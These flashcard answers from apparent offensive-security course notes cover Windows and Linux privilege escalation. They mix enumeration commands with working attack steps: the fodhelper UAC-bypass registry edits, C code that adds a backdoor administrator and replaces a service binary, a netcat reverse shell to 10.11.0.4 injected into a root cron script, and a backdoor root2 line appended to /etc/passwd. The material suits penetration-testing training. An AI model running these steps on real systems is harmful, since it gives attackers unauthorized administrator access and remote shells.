Privilege Escalation Flashcards

Question

In Windows, how can you enumerate Device Drivers and Kernel Modules?

Answer 1

- - C:\>powershell | - - PS C:\> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Answer 2

- We can use the Get-WmiObject cmdlet to get the Win32_PnPSignedDriver WMI instance, which provides digital signature information about the drivers - ---------------------------------- - - Get-WmiObject Win32 PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

Answer 3

-- /sbin/modinfo libata

Answer 4

- On Windows systems, we should check the status of the 'AlwaysInstallElevated' registry setting - If this key is set to '1' (enabled) in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer packages with Elevated Privileges. - We can use 'reg query' to check these settings: - -------------------------------- - - C:\> reg query HKEY_CURRENT_USER\Software\Policies \Microsoft\Windows\Installer - - C:\> reg query HKEY_LOCAL_MACHINE\Software\Policies \Microsoft\Windows\Installer

Answer 5

- SUID files - if the SUID permission is set on a binary it will run with the permissions of the file owner - if a binary has the SUID bit set and the file is owned by 'root', any local user will be able to execute that binary with elevated privileges - ---------------------------- - - find / -perm -u=s -type f 2>/dev/null

Answer 6

- windows-privesc-check | - - C:\> windows-privesc-check2.exe --dump -G

Answer 7

- unix-privesc-check

Answer 8

- Once a user is authenticated, Windows generates an access token that is assigned to that user - The token itself contains various pieces of information that effectively describe the security context of a given user, including privileges - Access tokens what are assigned a 'security identifier'(SID)

Answer 9

- Integrity Levels - This describes the level of trust the operating system has in running applications or securable objects - The configured Integrity Level dictates what actions an application can perform, including the ability to read or write to the local file system - ---------------------------------- - There are four Integrity Levels: - - System Integrity Process: System rights - - High Integrity Process: Administrative rights - - Medium Integrity Process: Standard user rights - - Low Integrity Process: very restricted rights often used in sandboxed processes

Answer 10

-- c:\> whoami /groups

Answer 11

- The Administrative user has two security tokens: - - medium integrity level token - - high integrity level token - UAC acts as the separation mechanism between those two integrity levels

Answer 12

- User Account Control - Forces applications and tasks to run in the context of a non-administrative account until an Administrator authorizes elevated access - UAC will block installers and unauthorized applications from running without the permissions of an administrative account - Two UAC modes: - - credential prompt - - consent prompt

Answer 13

- When a standard user wishes to perform an administrative task, such as installing a new application - The credentials of an Administrative User will be required to complete the install

Answer 14

- When a administrative user wishes to perform an administrative task - The administrative user simply has to confirm that the task should be completed

Answer 15

- Because UAC is enabled and the CMD terminal is running with the administrative users medium integrity level token

Answer 16

- Windows 10 build 1709 - Leverages a UAC bypass based on fodhelper.exe - This application is launched whenever a local user selects the "Manage optional features" option in the "Apps & Features" Windows Settings screen - --------------------------------------- - - C:\> \windows\System32\fodhelper.exe - -

Answer 17

- The Application Manifest is an XML file containing information that lets the operating system know how to handle the program when it is started. - We can inspect the manifest with the 'sigcheck' utility from 'Sysinternals' - ------------------------------------- - - C:\> cd C:\Tools\Privilege_escalation\ SysinternalsSuite - - C:\Sysin..\> sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

Answer 18

- the 'autoElevate' flag is set to 'True'

Answer 19

1. Run procmon.exe (sysinternals) 2. Filter on process named 'fodhelper.exe' 3. Run 'fodhelper.exe' 4. Filter on 'Result' value of 'NAME NOT FOUND', which shows 'fodhelper.exe' attempting to access registry keys that do not exist. 5. Focus on registry that we, as the current user, can control (HKEY_CURRENT_USER)(HKCU); Filter on 'Path' contains 'HKCU' 6. We see that 'fodhelper.exe' is trying to access HKCU:\Software\Classes\ms-setting\open\command registry key, which does not appear to exist.

Answer 20

1. Attempts to access 'HKCU:\Software\Classes\ms-setting\open\command' registry, but gets a 'NAME NOT FOUND' result (procmon) 2. When it fails above, it next tries to access the same key in HKEY_CLASSES_ROOT 3. Let's add the registry to HKCU instead: - - C:\> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command 4. Rerunning 'fodhelper.exe' in procmon, we see that attempts to query a value 'DelegateExecute' stored in HKCU 5. Next, we add 'DelegateExecute' entry to our registry: - - C:\> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ 6. Now, we see that 'fodhelper.exe' has a SUCCESS result (procmon) and finds the new 'DelegateExecute' entry, but finds an empty (Default) value 7. Finally, let's replace the empty (Default) value with cmd.exe - - C:\> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f 8. Running 'fodhelper.exe' now results in a CMD shell with admin access (high-integrity token) and we have bypassed UAC

Answer 21

- Setting the 'DelegateExecute' key value to an empty value (REG_SZ) and then setting it to cmd.exe - - C:\> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ - - C:\> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

Answer 22

1. Program runs as a Windows service 2. During install, the program receives full read write access to all members of the Everyone group 3. The program is replaced with a malicious file 4. The service is restarted and the malicious file is executed with SYSTEM privileges

Answer 23

- Program Files | - These services are user-installed, and have a potential to be installed with elevated privileges

Answer 24

PS C:\> Get-WmiObject win32-service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

Answer 25

- Windows utility that outputs the Security Identifiers (SIDs) followed by a permission mask - -------------------------------- - - C:\> icacls "C:\Program Files\Serviio\bin\ServiioService.exe"

Answer 26

- F = Full Access - M = Modify Access - RX = Read and execute access - R = Read-only access - W = Write-only access

Answer 27

- Any user (BUILTIN\Users) has Full-Access - We can replace ServiioService.exe with our own malicious binary - We can then reboot the service and execute our malicious binary

Answer 28

1. Create a 'C' file 'adduser.c' with the following code: -------------------------------- #include ``` int main () { int i; ``` i = system ("net user evil Ev!lpass /add"); i = system ("net localgroup administrators evil /add"); return 0; } ----------------------------------- 2. Cross-compile the code on our Kali machine with 'i686-w64-mingw32-gcc' with -o to specify the name of the compiled output: -- kali:~$ i686-w64-mingw32-gcc adduser.c -o adduser.exe 3. Transfer 'adduser.exe' to our target and replace 'ServiioService.exe' -- C:\> move "C:\Program Files\Serviio\bin\ServiioService.exe' "C:\Program Files\Serviio\bin\ServiioService_original.exe" -- C:\> move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe" 4. Restart the Serviio service -- C:\> net stop Serviio -- C:\> net start Serviio

Answer 29

- If the 'startmode' value is 'Auto' is will automatically start on a reboot - - C:\> wmic service where caption="Serviio" get name, caption, state, startmode

Answer 30

- If the user has the privilege 'SeShutdownPrivilege' | - - C:\> whoami /priv

Answer 31

C:\> shutdown /r /t 0

Answer 32

- when we have write permissions to a service's main directory and subdirectories, but cannot replace files within them - Each Windows service maps to an executable file that will be run when the service is started. - Most of the time, services that accompany third party software are stored under the C:\Program Files directory

Answer 33

- when using file or directory paths that contain spaces, the developers should always ensure that they are enclosed by quotation marks - this ensures that they are explicitly declared - However, when this is not the case and a path is unquoted, it is open to interpretation - Specifically, in the case of executable paths, anything that comes after each whitespace character will be treated as a potential argument or option for the executable

Answer 34

1. C:\Program.exe 2. C:\Program Files\My.exe 3. C:\Program Files\My Program\My.exe 4. C:\Program Files\My Program\My Service\service.exe

Answer 35

- Place a malicious executable named 'My.exe' in either the 'C:\Program Files\My Program' directory or 'C:\Program Files\My Program\My Service' directory. - The ideal outcome would be when the service runs, it should execute the malicious 'My.exe' with the same privileges that the service starts with - Often, these privileges are the NT\System account, which would result in a successful privilege escalation attack

Answer 36

- When attempting to exploit system-level software (such as drivers or the kernel itself), we must pay careful attention to several factors: - - the target's OS - - version - - architecture - ------------------ - Failure to accurately identify these factors can trigger a BSOD

Answer 37

- Third-party driver exploits are more common, and as such, we should always attempt to investigate this attack surface first - Native kernel vulnerabilities are less common and more difficult to exploit

Answer 38

-- C:\> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

Answer 39

- - C:\> driverquery /v | * ** This output primarily consists of typical Microsoft-installed drivers and third party drivers

Answer 40

-- C:\> type USBPcap.inf

Answer 41

1. Find the OS version and architecture -- C:\> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 2. Enumerate the drivers that are installed on the system -- C:\> driverquery /v 3. Query 'searchsploit' for any exploits for third party drivers discovered, looking specifically for exploits that match the driver version number 4.

Answer 42

- the vast majority of exploits targeting kernel-level vulnerabilities are written in a low-level programming language such as C or C++ - therefore, exploits must be compiled - ideally, we want to compile code on the platform version we are attacking, and should spin up a VM that matches our target, and compile the code there - However, we can also cross-compile the code on an operating system entirely different from the one we are targeting

Answer 43

1. Run the 'mingw-w64.bat script that sets up the PATH env variable for the 'gcc' executable - - C:\> mingw-w64.bat 2. Run gcc to make sure it is working properly - - C:\> gcc -help 3. Transfer the exploit code to the Windows client and compile it - - C:\> gcc 41542.c -o exploit.exe * ** May get warnings, but still works *** 4. Run malicious executable

Answer 44

- an executable file - allows us write access - runs at an elevated privilege level

Answer 45

- the 'cron' time-based job scheduler - system-level jobs are executed with root user privileges and system admins often create scripts for cron jobs with insecure permissions

Answer 46

- - ls -lah /etc/cron* - - cat /etc/crontab - - grep "CRON" /var/log/cron.log

Answer 47

-- ls -lah /var/scripts/user_backups.sh

Answer 48

- - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f - ------------------------------- - rm /tmp/f = removes any existing named pipes - mkfifo /tmp/f = creates a named pipe - cat /tmp/f|/bin/sh -i = creates an interactive shell on the local machine and hooks the output of the pipe to the shell's input - 2>&1|nc 10.11.0.4 1234 = takes the output of the shell and sends it over the network to a machine listening on port 1234 at 10.11.0.4 - >/tmp/f = takes the output of 'nc' and sends it to the named pipe's input, where it becomes input for the shell

Answer 49

-- echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f" >> user_backups.sh

Answer 50

- Linux passwords are stored in /etc/shadow - password hashes are stored in /etc/passwd - If a password hash is present in the second column of a /etc/passwd user record, it is considered valid for authentication and takes precedence over the respective entry in /etc/shadow - This means that if we can write into the /etc/passwd file, we can effectively set an arbitrary password for any account -

Answer 51

- crypt algorithm

Answer 52

1. Generate the password hash for 'evil' - - openssl passwd evil 2. Write the generated password hash to the /etc/passwd file for the user 'root2' and add to the 'root' user group - - echo "root2:AD24fcSx2Il3I:0:0:root:/root:/bin/bash" >> /etc/passwd

Answer 53

- - cat /etc/issue - - uname -r - - searchsploit linux kernel * ** EX: searchsploit linux kernel Ubuntu 16.04 ***

Answer 54

-- gcc 43418.c -o exploit